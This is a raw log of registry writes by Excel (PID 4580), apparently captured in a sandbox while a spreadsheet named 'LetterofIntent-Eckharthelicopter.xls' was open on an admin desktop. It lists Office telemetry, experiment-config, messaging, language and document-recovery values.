HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
4580
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
4580
EXCEL.EXE
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\196\52C64B7E
LanguageList
en-US
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel
BuildNumber
16.0.12026
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
04000000E41100003B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004C00650074007400650072006F00660049006E00740065006E0074002D00450063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000E06D65C5FC61D60157F4292657F4292600000000E0020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|13
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|3
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
VersionId
uint16_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
EnableActiveXControlMSWebBrowserArchiteturePersistenceIssue
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629FBBA
2629FBBA
04000000E41100003B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004C00650074007400650072006F00660049006E00740065006E0074002D00450063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000F65686BBFC61D601BAFB2926BAFB292600000000E00200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasBoot_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasLocalSaveDocument_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
fr-fr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ru-ru
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
1
01D014000000001000284FFA2E01000000000000000400000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
de-de
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ru-ru
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
pt-br
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
de-de
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
4--
342D2D00E41100000000044001000000F2A918C3FC61D601D20600001D32BF610AC392449F757F82F56F1BC1424716C3FC61D6010000000000001000284FFA2E00000000060000006F006E000200000000000000000000000000556E6B6E6F776E00000000000000000000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C00540000000000AB0AD9010000D289EF42FF7F000040000000D901000000000000D90100005034A70CD901000048F1AFEB3B0000002020A30CD9010000D8F1AFEB3B000000D8F7AFEB3B00000000F5AFEB3B00000090168E0CD9010000D8F1AFEB3B00000098F4AFEB3B00000090168E0CD901000000F5AFEB3B000000340000C000000000D8F7AFEB3B000000D8F7AFEB3B00000010F2AFEB3B000000D031A70CD9010000B031A70CD90100005C0EBE22FF7F00000000000000000000C31EBE22FF7F0000E031A30CD90100008A28AE22FF7F0000FEFFFFFFFFFFFFFFD031A70CD901000000168E0CD901000090168E0CD901000090168E0CD9010000CE25BE22FF7F00009037AD0CD9010000B031A70CD901000098178E0CD901000008178E0CD9010000FEFFFFFFFFFFFFFFE865C622FF7F0000FEFFFFFFFFFFFFFF70178E0CD90100000000000000000000DB01BD22FF7F0000D0F1AFEB3B00000010F2AFEB3B000000D8F7AFEB3B000000998EC09A0B23E847E031A30CD90100008A28AE22FF7F0000000000000200000090168E0CD9010000E032A30CD9010000E031A30CD901000034030000000000001562BB22FF7F000030F2AFEB3B00000066F5AD22FF7F0000E031A30CD90100006380BC22FF7F00000000000000000000F8F1AFEB3B000000FEFFFFFFFFFFFFFF9675AD22FF7F00000000000000000000440045004600410055004C005400000030030000000000004014A50AD901000000000000FF7F00000000A50AD90100006020A30CD901000000F5AFEB3B00000090000000FF7F000098F4AFEB3B00000030030000000000000000000000000000C00CA50AD90100000000AB0AD90100009CBBEF42FF7F0000F006000000000000000000000000000000000000000000001C0000000000000000000000000000007668EF42FF7F0000000000000000000000000000000000000000AB0AD901000001000000FF7F0000000000000000000030D2A20CD90100001000000000000000FC000000CA02000000000000D901000020D2A20CD901000020D2A20CD9010000FF030000000000008000000000000000E0070000000000000D010000000000000D010000000000000D0100000000000000000000000000000300000000000000E0F7AFEB3B000000C0F4AFEB3B0000000496BF22FF7F0000353FFFFF6D00000088F4AFEB32FEFFFF0300000000000000E4C2AB0AD90100005001AB0AD90100007C010000000000006040A30CD9010000F61FBE22FF7F000020C3AB0AD90100000D01000000000000FEFFFFFFFFFFFFFFBF9ABF22FF7F000030F4AFEB3B00000066F5AD22FF7F000000000000D9010000F8008B40FF7F000000F9AFEB3B000000F00600000000000000000000000000009D01EF42FF7F00000D010000000000001700000000000000440045004600410055004C005400000090719340FF7F000002000002FF7F000098F5AFEB3B00000000000000000000004628AD20FF7F00004A030049FF7F000001000000000000003AC108F30000000001F5AFEB3B00000002000002FF7F00002020A30CD901000000000000D901000001F5AFEB3B0000000100000000000000340000C03B0000004A030049FF7F0000D084C722FF7F0000A884C722FF7F000050A0A60CD901000000178E0CD9010000407A971DFF7F00005034A70CD901000000000000000000000000000000000000407A971DFF7F000000000000000000006F00000000000000F0060000000000000000AB0AD9010000AB8EEF42FF7F00000000AB0AD901000002000000FF7F0000E006000000000000F0060000000000008806AB0AD9010000F8F4AFEB3B0000006040A30CD901000003000000FF7F00006040A30CD90100006040A30CD901000018000000000000007668EF42FF7F00002020A30CD9010000D67BD220FF7F00000000000000000000658BB922FF7F00005034A70CD9010000D67BD220FF7F000030881B1EFF7F00000100000000000000407A971DFF7F000000000000000000000800000000000000CB853C20FF7F0000A0D2A20CD9010000E006000000000000A0F9AFEB3B000000000000000000000030D2A20CD9010000A37C3C20FF7F000040D2A20CD9010000A0F9AFEB3B0000004FF406EBE915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006E006F00
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
Provider
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSAllCategories
10
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
Categories
06020000170200000B020000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
Categories
BF010000CD030000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
CallDelta
86400
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
pt-br
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\4580
0
0B0E101D32BF610AC392449F757F82F56F1BC1230046FEA98B96CCBF98EB016A0410240044FA5D64A89E01008500A907556E6B6E6F776EC9062E226D2B484F4D616659574A5464337373702B3165327141506A326C775347586F6C4A7635624B6E337449506B3D2200
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ja-jp
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ko-kr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
fr-fr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ko-kr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
it-it
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
3--
332D2D00E41100000100000000000000424716C3FC61D60100000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\2629F457
2629F457
04000000E41100003B00000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004C00650074007400650072006F00660049006E00740065006E0074002D00450063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000E06D65C5FC61D60157F4292657F4292600000000E0020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|4
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\4580
0
0B0E101D32BF610AC392449F757F82F56F1BC1230046FEA98B96CCBF98EB016A0410240044FA5D64A89E01008500A907556E6B6E6F776EC9062E22347947615039756D6C4332514C4546313631464A36303146316869753233304F4B50696D3844455633566B3D2200
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|10
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
es-es
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
es-es
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
tr-tr
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
it-it
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
ja-jp
2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
tr-tr
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
FOLDERID_Desktop
C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
FOLDERID_Documents
C:\Users\admin\Documents\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{02FD33DF-F746-4A10-93A0-2BC6273BC8E4}
4
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|7
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems
v<-
763C2D00E411000000000040010000002E8E65C5FC61D6018800000002000000780000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C006C00650074007400650072006F00660069006E00740065006E0074002D00650063006B006800610072007400680065006C00690063006F0070007400650072002E0078006C007300000000000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|11
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
MSForms
1
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
EnableActiveXControlArchitetureIndependent
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ETWMonitor\{F562BB8E-422D-4B5C-B20E-90D710F7D11C}
2
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
E407070005001800140037001E001803
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
DC00000000000000803A0900E407070005001800140037001E001803000000000000000000000000201C0000201C00008051010080510100805101008051010080F4030080F4030080F403002C01000084030000805101000000000084030000805101000A0000001E0000001E000000000000000000000080510100010000000100000000000000000000000000000000000000008D2700008D2700008D2700010000000A000000805101000000300000003000000030000000000084030000805101002C0100008403000080510100050000000500000005000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
E407070005001800140037001E001803
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
int64_t|0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSTagIds0
17846737,5804129,17696988,18409363,17339781,8758344,17634580,18375312,18658649,7668685,18948102,18428691,7214608,9319450,17126295,18658648,17322183,5850062,18384724,18658650,18637650,18674530,20789191,16920930,17311449,17698821,18409416,7668686,22131214,18948101,7398615,20026645,19978122,17182941,7668692,7440607,22131171,18711811,19153728,17182981,17182942,4859234,25514583,18384801,17322188,17331930,5601374,19543138,17146274,7668683,5898847,17622912,5850584,8263521,8254547,22070208,18633496,23729926,17182980,8988293,18474530,8697678,17922253,7649375,4317338,17372928,21030619,16859363,6636695,17322181,9176926,24466059,5850122,17956946,6366290,8448079,5850463,6690465,7649377,17064074,5850305,5850582,17425358,8750272,8709129,19223073,5898845,18917267,17182979,6166345,17885409,17846738,17182943,23729931,17322184,7459348,6636694,5850583,22131201,8430030,7218753,17846749,5810308,17182982,18970382,22595280,5850061,5898851,17331926,7668682,17331923,7668681,17698820,17846753,7668693,17331927,17846750,17331929,17127502,6137435,23459486,6170083,17127501,17698822,8988294,17106064,17846730,17698823,17846747,17846734,7398614,17110992,22853700,18948169,17846735,17846748,17846736,19261452,19261450,19261453,19261451,6341763,7116053,6366291,17610659,18716634,18716635,17372899,17102418,17914001,18917269,6029780,8750242,17913997,17913998,17913999,4289286,17914000,7463684,17914002,17914003,5898849,22872910,17962391,24466061,8433728,5898880,5898881,5898884,22929427,8701660,18917328,18917326,18949600,17578125,18917268,18917271,22131169,18917330,18970383,25514584,18949601,22595279,17322179,22131208,18208672,22131207,17127511,22131213,8750241,22853699,5850525,5587867,22929425,4564173,23414153,17127509,18208656,16815750,7690258,8263520,22083550,7463105,22872911,7690253,19978123,18647262,25514585,5601367,17962392,7966755,25514582,6647824,17573643,7868952,17445651,17106059,17445650,17106060,17106065,17106063,17962113,19744898,18625879,19531353,36467677,5601379,7202269,23978014,7168707,6059089,17110988,5601366,8709120,18441314,17311443,8747207,19174148,18208657,22349186,17311450,18633497,9037324,8996805,4859233,17969938,18208715,18208705,18208658,17311446,8709078,8709086,8709089,18621250,8709081,20248016,16860185,7214607,8750274,16843347,20489431,17339214,17618826,18384725,7690256,19744899,19732354,5888003,19732353,36467808,7690254,19543137,18375313,18384802,18647260,18647259,18647261,20026646,7657413,7649378,7657414,17842627,8447777,16815754,18970381,19198081,17045407,17045408,8430031,8254544,6301592,17425365,24131419,17322180,17322182,17322187,22929429,8758345,36292435
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\excel.exe\ULSMonitor
ULSCategoriesSeverities
827 15,1001 15,1000 15,1282 50,226 15,999 15,1338 50,1338 10,1249 10,998 15,1039 15,831 15,1282 10,1249 15,1338 15,1282 15,829 15,1128 15,291 15,850 15,1622 50,828 15,1255 15,830 15,974 15,670 15,671 15,1002 15,669 15,70 50,2086 15,2087 15,2088 15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
excel.exe
02E0C11717D3479948A6D31022DB7415E01000000000000000300034003100310031002D003000380033002D00300034003300370032003900000001000000010000000600000000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasOutSpaceSaveAs_Win32
TimeToNextcall
2020-07-25T20:55:35Z
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_InAppPurchase_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
ETag
std::wstring|"4yGaP9umlC2QLEF161FJ601F1hiu230OKPim8DEV3Vk="
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|8
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|18
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|9
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|19
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasBoot_Win32
AppIdOnAction
4294967295
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
SetUserAction
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
MessageId
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageData\1:en-US:Office_CanvasOutSpaceSaveAs_Win32
TransactionId
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
Item 1
[F00000000][T01D661FCC7C57DF0][O00000000]*C:\Users\admin\Desktop\
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
DeferredConfigs
std::wstring|ofsh6c2b1tla1a31,ofcrui4yvdulbf31,ofhpex3jznepoo31,ofaa1msspvo2xw31,ofgg6vdq3anjh131,of3ttwdwizkwt531,ofskuekmq22yki31
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:Office_CanvasLocalSaveDocument_Win32
MaxWait
2000
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService\MessageMetadata\0_MsgId:BizBar
ShouldShowBadging
0
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
CountryCode
std::wstring|IT
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|12
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel
Expires
int64_t|1595667333
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|6
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|15
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|2
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|16
4580
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigContextData
ChunkCount
uint64_t|17
4580
EXCEL.EXE
write
